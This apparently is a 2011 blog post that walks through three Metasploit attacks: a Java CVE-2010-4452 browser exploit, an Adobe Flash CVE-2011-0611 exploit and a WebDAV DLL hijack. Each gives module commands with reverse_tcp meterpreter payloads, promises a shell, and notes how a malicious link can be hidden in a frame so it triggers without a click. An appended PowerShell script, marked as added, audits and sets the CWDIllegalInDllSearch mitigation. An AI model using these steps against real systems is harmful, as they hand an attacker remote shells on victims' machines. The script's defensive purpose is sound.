Saturday, 30 April 2011

JAVA CVE-2010-4452

CVE:  CVE-2010-4452
Remote:  Yes
Local:  No
Published:  Feb 15 2011 12:00AM
Updated:  Apr 19 2011 08:45PM
Description: Oracle Java is prone to a remote code-execution vulnerability in the Java Runtime Environment. An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. This vulnerability affects the following supported versions: 6 Update 23 and lower.
To exploit it, you can use the following syntax in Metasploit:
use windows/browser/java_codebase_trust
set SRVPORT 80
set PAYLOAD java/meterpreter/reverse_tcp
set LPORT 8888
Then open up the client browser and open the URL
You should get your shell!
I tested on Windows XP and Windows 7; both worked fine, but it didn't work on Ubuntu.

Adobe Flash Player CVE-2011-0611 'SWF' File Remote Memory Corruption Vulnerability

Remote:  Yes
Local:  No
Published:  Apr 11 2011 12:00AM
Updated:  Apr 21 2011 04:14PM
Hello everyone, it's been a while since my last post. Sorry for the delay on the posts, but lately I am really busy; I will try to keep it up. Today I will do 3 posts: the first one is for Adobe Flash, the other is for WebDAV and the last for Java!
So, this Adobe exploit is just another one in the wild... there are so many that I have decided to put up the latest one. No big fuss, just prepare the server in Metasploit and open the link on the client, so let's do this:
1) msfconsole and then type this (adjust to your IP address)
use windows/browser/adobe_flashplayer_flash10o
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 8888
set SRVPORT 80
[*] Exploit running as background job.
[*] Started reverse handler on
[*] Using URL:
[*] Server started.
Now, open this URL on the client and you will get your shell.
sessions -i 1
Bear in mind that this link can be hidden inside a div or a frame, so a malicious link can be opened even if you don't click on anything.
And that's it ;)

DLL Hijacking

This vulnerability is triggered when a vulnerable file type is opened from the server that is hosting the files.
Usually, the user has to browse to the directory and open the file; this can be any file, even a blank one with nothing inside.
The flaw is that the application launched to handle the file type will inadvertently load a DLL from the working directory (the share hosting the file), and then we get our shell. So let's do this one.

1) open msfconsole
msf> search webdav.dll
msf> use windows/browser/webdav_dll_hijacker
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set BASENAME  reports
msf> set extensions grp
msf> set LHOST
msf> set SRVHOST
msf> set LPORT 8888
msf> set SRVPORT 80
msf> set SHARENAME documents
msf> exploit
Now, go to the client, browse to this directory file://192.1681.1.69/ and click on any file.
Done, you have your shell.
msf> sessions

Now, go to this website to see the list of all apps that are vulnerable
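From the defender's side, the working-directory DLL load described in the DLL Hijacking section is exactly what Microsoft's CWDIllegalInDllSearch registry value (KB2264107) turns off. The PowerShell script below is an added example, not part of the original post: it audits that value on a Windows client and, if it is not set, applies the mode that blocks DLL loads when the working directory is a WebDAV or remote share. The function names are my own; run it in an elevated session.

```powershell
# Added example (not from the original post): audit and apply the
# CWDIllegalInDllSearch mitigation from KB2264107, which removes the current
# working directory (the attacker's WebDAV share in the post above) from the
# DLL search order.
$KeyPath   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
$ValueName = 'CWDIllegalInDllSearch'

function Get-CwdDllSearchState {
    $prop = Get-ItemProperty -Path $KeyPath -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $prop) {
        return [pscustomobject]@{
            Value    = $null
            Hardened = $false
            Meaning  = 'value missing: CWD is searched for DLLs (exposed to the hijack above)'
        }
    }
    # A registry DWORD comes back as a signed Int32, so the documented value
    # 0xFFFFFFFF shows up here as -1.
    $v = [int]$prop.$ValueName
    $meaning = switch ($v) {
        -1      { 'CWD is never searched for DLLs' }
        2       { 'CWD is skipped when it is a WebDAV or remote network share' }
        1       { 'CWD is skipped when it is a WebDAV share' }
        0       { 'legacy: CWD is searched for DLLs (exposed to the hijack above)' }
        default { "undocumented value $v" }
    }
    [pscustomobject]@{ Value = $v; Hardened = ($v -in -1, 1, 2); Meaning = $meaning }
}

function Set-CwdDllSearchBlocked {
    # Mode 2 covers the WebDAV/remote share case from the post. -1 (0xFFFFFFFF)
    # is the strictest setting and can break applications that rely on loading
    # DLLs from their working directory, so test it before rolling it out.
    param([ValidateSet(-1, 1, 2)][int]$Mode = 2)
    New-ItemProperty -Path $KeyPath -Name $ValueName -PropertyType DWord `
                     -Value $Mode -Force | Out-Null
}

$before = Get-CwdDllSearchState
"Before: {0} ({1})" -f $before.Value, $before.Meaning
if (-not $before.Hardened) { Set-CwdDllSearchBlocked -Mode 2 }
$after = Get-CwdDllSearchState
"After:  {0} ({1})" -f $after.Value, $after.Meaning
```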